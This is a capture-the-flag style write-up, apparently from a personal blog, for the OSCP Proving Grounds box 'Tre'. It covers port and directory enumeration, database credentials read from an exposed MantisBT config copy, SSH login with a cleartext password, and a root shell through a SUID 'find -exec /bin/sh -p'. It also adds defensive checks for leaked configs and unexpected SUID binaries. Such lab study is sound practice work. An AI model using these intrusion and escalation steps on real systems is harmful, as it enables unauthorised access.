OSCP-PG-Tre

Mkd1R 2022-5-24 92 5/24

#Enumeration

-Nmap

#nmap -vvv 192.168.139.84
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
8082/tcp open blackice-alerts syn-ack ttl 63
# nmap -sCV -p 80,22,8082 192.168.139.84 -o nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
| 256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_ 256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Tre
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

-Gobuster1

# gobuster dir -u http://192.168.113.84 -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt 
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htaccess.json       (Status: 403) [Size: 279]
/.htpasswd.json       (Status: 403) [Size: 279]
/adminer.php          (Status: 200) [Size: 4586]
/cms                  (Status: 301) [Size: 314] [--> http://192.168.113.84/cms/]
/index.html           (Status: 200) [Size: 164]
/info.php             (Status: 200) [Size: 87833]
/mantisbt             (Status: 301) [Size: 319] [--> http://192.168.113.84/mantisbt/]
/server-status        (Status: 403) [Size: 279]
/system               (Status: 401) [Size: 461]

-Gobuster2

# gobuster dir -u http://192.168.113.84/mantisbt/ -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt 
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd.json       (Status: 403) [Size: 279]
/.htaccess.json       (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/admin                (Status: 301) [Size: 325] [--> http://192.168.113.84/mantisbt/admin/]
/api                  (Status: 301) [Size: 323] [--> http://192.168.113.84/mantisbt/api/]
/bug_report.php       (Status: 200) [Size: 5006]
/composer.json        (Status: 200) [Size: 368]
/config               (Status: 301) [Size: 326] [--> http://192.168.113.84/mantisbt/config/]
/core                 (Status: 301) [Size: 324] [--> http://192.168.113.84/mantisbt/core/]
/core.php             (Status: 200) [Size: 0]
/css                  (Status: 301) [Size: 323] [--> http://192.168.113.84/mantisbt/css/]
/doc                  (Status: 301) [Size: 323] [--> http://192.168.113.84/mantisbt/doc/]
/file_download.php    (Status: 302) [Size: 0] [--> http://192.168.113.84/mantisbt/login_page.php?return=%2Fmantisbt%2Ffile_download.php]
/fonts                (Status: 301) [Size: 325] [--> http://192.168.113.84/mantisbt/fonts/]
/images               (Status: 301) [Size: 326] [--> http://192.168.113.84/mantisbt/images/]
/index.php            (Status: 302) [Size: 0] [--> http://192.168.113.84/mantisbt/login_page.php]
/js                   (Status: 301) [Size: 322] [--> http://192.168.113.84/mantisbt/js/]
/lang                 [--> http://192.168.113.84/mantisbt/lang/]
/library              (Status: 301) [Size: 327] [--> http://192.168.113.84/mantisbt/library/]
/login.php            [--> http://192.168.113.84/mantisbt/login_page.php?error=1&username=&return=my_view_page.php]
/main_page.php        [--> http://192.168.113.84/mantisbt/login_page.php?return=%2Fmantisbt%2Fmain_page.php]
/plugin.php           (Status: 200) [Size: 4946]
/plugins              (Status: 301) [Size: 327] [--> http://192.168.113.84/mantisbt/plugins/]
/scripts              [--> http://192.168.113.84/mantisbt/scripts/]
/search.php           (Status: 302) [Size: 0] [--> http://192.168.113.84/mantisbt/login_page.php?return=%2Fmantisbt%2Fsearch.php]
/vendor               (Status: 301) [Size: 326] [--> http://192.168.113.84/mantisbt/vendor/]
/view.php             (Status: 200) [Size: 4944]
/wiki.php             (Status: 200) [Size: 4944]

#Web enumeration

The scan results include a config file that contains the database information:
http://192.168.113.84/mantisbt/config/a.txt
# --- Database Configuration ---
$g_hostname      = 'localhost';
$g_db_username   = 'mantissuser';
$g_db_password   = 'password@123AS';
$g_database_name = 'mantis';
$g_db_type       = 'mysqli';
These credentials can be used to log in here:
http://192.168.113.84/adminer.php
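An added check, not part of the original writeup, that a defender can run against a MantisBT web root to catch exactly this leak: a copy of the config saved under a non-PHP extension (here a.txt) is served by Apache as plain text instead of being executed. WEBROOT and the temporary directory layout built in demo are assumptions.

```shell
# Added example (not from the original writeup): find copies of MantisBT's
# config under extensions Apache serves verbatim, which is how a.txt leaked
# the database password above. WEBROOT is an assumed default path.
WEBROOT="${WEBROOT:-/var/www/html}"

# leaked_config_files: list files under the given root that contain a MantisBT
# database setting but are not .php, so the web server returns them as text.
leaked_config_files() {
  root="$1"
  find "$root" -type f ! -name '*.php' \
       -exec grep -lE '^\$g_db_(password|username)[[:space:]]*=' {} + 2>/dev/null
}

# demo: build a constructed web root in a temp dir mirroring the page's layout
# (config_inc.php plus a stray a.txt copy) and print the leaked path(s) found,
# with the temp prefix stripped so the output is stable.
demo() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/mantisbt/config"
  printf '<?php\n$g_db_password = "x";\n' > "$tmp/mantisbt/config/config_inc.php"
  printf '$g_db_password   = "x";\n' > "$tmp/mantisbt/config/a.txt"
  leaked_config_files "$tmp" | sed "s|^$tmp||"
  rm -rf "$tmp"
}

# Against a real host: leaked_config_files "$WEBROOT"
```

Only a.txt is reported; config_inc.php is skipped because Apache executes .php rather than serving its source.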

#Exploitation

The tre account can log in over SSH, giving an initial low-privileged user foothold.
# sshpass -p Tr3@123456A! ssh -p 22 tre@192.168.197.84
Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 23 22:27:01 2022 from 192.168.49.197
tre@tre:~$ whoami
tre

#Escalation

Running LinEnum (https://github.com/rebootuser/LinEnum) to enumerate more information turned up a check-system file that runs at system boot, and sudo -l showed that we have shutdown privileges, so I will use check-system to add the SUID bit to the find command.
# sshpass -p Tr3@123456A! ssh -p 22 tre@192.168.197.84
Last login: Mon May 23 23:06:03 2022 from 192.168.49.197
tre@tre:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/mount
/usr/bin/find
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

#SUID

tre@tre:~$ find . -exec /bin/sh -p \; -quit
# whoami
root
# 
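As an added example (not from the original writeup), the same listing turned into a baseline check that flags an unexpected SUID binary such as /usr/bin/find. The baseline is assumed to be the stock Debian 10 set shown above; regenerate it from a clean image before relying on it.

```shell
# Added example (not from the original writeup): flag SUID binaries that are
# missing from a known-good baseline; on this box it would have flagged
# /usr/bin/find. The baseline list below is an assumption built from a stock
# Debian 10 install: generate your own from a clean image.
SUID_BASELINE='/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/mount
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device'

# suid_anomalies: read SUID paths from stdin (one per line) and print each
# one that is not in the baseline. Returns 1 if anything was flagged, else 0.
suid_anomalies() {
  found=0
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    if ! printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$path"; then
      printf 'UNEXPECTED SUID: %s\n' "$path"
      found=1
    fi
  done
  return "$found"
}

# audit_live: the same listing the writeup ran, piped into the check; suitable
# for a cron job or a configuration-management compliance test.
audit_live() {
  find / -xdev -perm -4000 -type f 2>/dev/null | suid_anomalies
}

# Constructed sample input: a subset of the listing captured on the box,
# including the find binary after the SUID bit was added.
SAMPLE_LISTING='/usr/bin/su
/usr/bin/passwd
/usr/bin/find
/usr/lib/openssh/ssh-keysign'

# check_sample: runs the check over the sample; returns 1 because find is flagged.
check_sample() {
  printf '%s\n' "$SAMPLE_LISTING" | suid_anomalies
}
```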
- THE END -

Mkd1R

July 2, 21:56

Last modified: July 2, 2022

Unless otherwise stated, all articles on this blog are the author's original work.